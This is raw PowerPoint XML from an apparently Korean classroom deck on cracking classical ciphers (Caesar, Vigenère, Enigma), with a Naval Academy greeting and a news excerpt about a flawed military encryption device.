                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>The elite guardianships produced by the Naval Academy have dedicated themselves to their motherland</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>and are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>still striving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>to raise the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>of Korea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>in all parts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Like the adage that those who rule the sea dominate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>world</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, we will meet the expectations of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>nation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>and the people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>nurturing talented people who protect the sea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>our place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>of living </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>and the channel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>national prosperity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>look forward to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>your continued interest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>and support for our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Naval Academy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. Thank you.</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해군사관학교는 해방과 함께 손원일 제독을 비롯한 해양 선각자들이 조국의 바다를 수호할 정예 해군장교를 양성하고자 개교했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>그동안 해군사관학교가 배출한 정예 호국간성들은 조국을 위해 헌신하였으며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>지금도 세계 각지에서 대한민국의 위상 제고를 위해 노력하고 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바다를 지배하는 자가 세계를 지배한다는 격언처럼 우리의 생활 터전이자 국가번영의 통로인 바다를 지키는 우수한 인재를 양성하여 국가와 국민의 기대에 부응하겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>앞으로도 우리 해군사관학교에 대한 지속적인 관심과 성원을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>당부드립니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>감사합니다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1423005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/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고전암호 크래킹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>카이사르 암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</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더 깊은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그러나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여기엔 키 값을 알 수 없었다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암호문을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7" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{211C265B-4B92-46DA-A10F-F09FDDCA994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6762673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HMALY YLJLPCPUN HU VYKLY MYVT AOL ZLUHAL AV KPZTHUASL HSS VM AOL JVYWZ PU NHBS HUK HWWLHY PU YVTL, OL SLK AOL JVYWZ AV JYVZZ AOL YBIPJVU YPCLY. HA AOL APTL, AOL YBIPJVU YPCLY DHZ AOL IVYKLY ILADLLU YVTL HUK AOL WYVCPUJLZ, HUK PA DHZ UVA HSSVDLK AV JYVZZ AOL YPCLY DPAO AYVVWZ. JHLZHY ZHPK OPZ KPJL DLYL AOYVDU HZ OL JYVZZLK AOPZ YPCLY.</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/2</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E3AECEE3-C321-44DD-A870-D626B7F77FB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699327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pyEnchant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116512964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79315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Intro</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242EE190-AFAE-4D86-9B09-1F59607B0160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152939" y="1933191"/>
            <a:ext cx="7258050" cy="1057275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71627300-8D1E-4A72-A335-56BB869301AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152939" y="3184277"/>
            <a:ext cx="10200861" cy="3308598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>JTBC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>가 입수한 국방부 내부 문건입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>"PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>암호장비 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>MDH-05B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>시험 결과</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>평문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t> 통신 가능성이 일부 식별됐다</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고 돼 있습니다</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군사기밀을 암호로 바꿔주는 장비가 제구실을 못하고 있다는 뜻입니다</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해킹 위험이 클 수밖에 없습니다</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암호장비 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>MDH-05B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>는 육</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해</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공군 대다수 보안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>에 장착돼 있습니다</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또 다른 국방부 문건에도 오류 가능성이 언급돼 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="HelveticaNeue-Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>이런 결함들이 발견돼 국방부에 보고됐지만</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묵살됐다는 군 핵심 관계자의 증언도 나왔습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
            </a:b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군 관계자 </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그때도 </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결함이 발견돼</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건의가 됐었고</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그런데 크게 이슈화가 되지 않았고</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국방부 보고 자리에도 올라갔지만 묻히는 걸로 갔죠</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자칫 군 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>작전망</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t> 전체가 먹통이 될 수 있다는 경고도 이어졌습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
            </a:b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군 관계자 </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이건 작전망에 쓰이는 </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암호</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장비입니다</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암호화가 안 되면</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작전망을 어떤 시점에서 다 죽여버릴 수가 있어요</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그러나 국방부는 자세한 설명 없이 문제가 없다는 입장을 내놨습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue-Regular"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291380537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274422630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/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>카이사르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32678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/5</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0399485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a:t>Ciphertext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>부분에 암호문을 복사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>붙혀넣기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>한후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>엔터를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 친다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0F1D7DB4-BCCA-4BEA-8ED5-BFDFB3699D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479208" y="734600"/>
            <a:ext cx="5428611" cy="1003200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147982897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8894855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고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>비즈네르</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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navy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110052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RNDEZADQNHDEULTRRCCLVCVJYYYCFIBLRDHYPHDLRTCCCRJZYEHGFWZYEEOPLIIEGOWCNTOFVSHYPHDLRWDRUHPKNNNUUAOGSOIJLOOFRRHYPHDLRSXMHLYZRAORUINKNCCGAENMZEOGZENQBMZMAETMHNZTRRZTRNOFBUBFGOAZRCVSFEOFRYYMGHDLTSOFNTIMBNZRUOPEUTJD</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730338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err="1"/>
              <a:t>ㅇ</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8D441FC0-3FF2-45C1-9314-CDB4120A70C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="923304" y="1105065"/>
            <a:ext cx="4143375" cy="3009900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259461738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ENIGMAISAHIGHLYTECHNICALLYDESIGNEDMACHINETHEPROBLEMISWEARETRYINGTOBEATTHISMACHINEWITHHUMANSWHATIFONLYOTHERMACHINESCOULDBEATTHISMACHINESOMETIMESSOMEONEYOUNEVEREVENTHOUGHTOFBECAUSETHEYDOTHINGSTHATNOONETHOUGHTOF</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Enigma is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>highly technically designed machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>The problem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, we are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>trying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>to beat this machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>with humans.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>only other machines could beat this machine?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Sometimes someone you never even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>thought of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Because they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>do things that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>no one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>thought of.</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err="1"/>
              <a:t>에니그마는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 고도의 기술로 설계된 기계예요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>문제는 우리가 사람으로 이 기계를 이기려 하는 거죠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>만일 다른 기계만이 이 기계를 이길 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>있다면요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가끔은 생각지도 못한 누군가가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>누구도 </a:t>
            </a:r>
            <a:r>
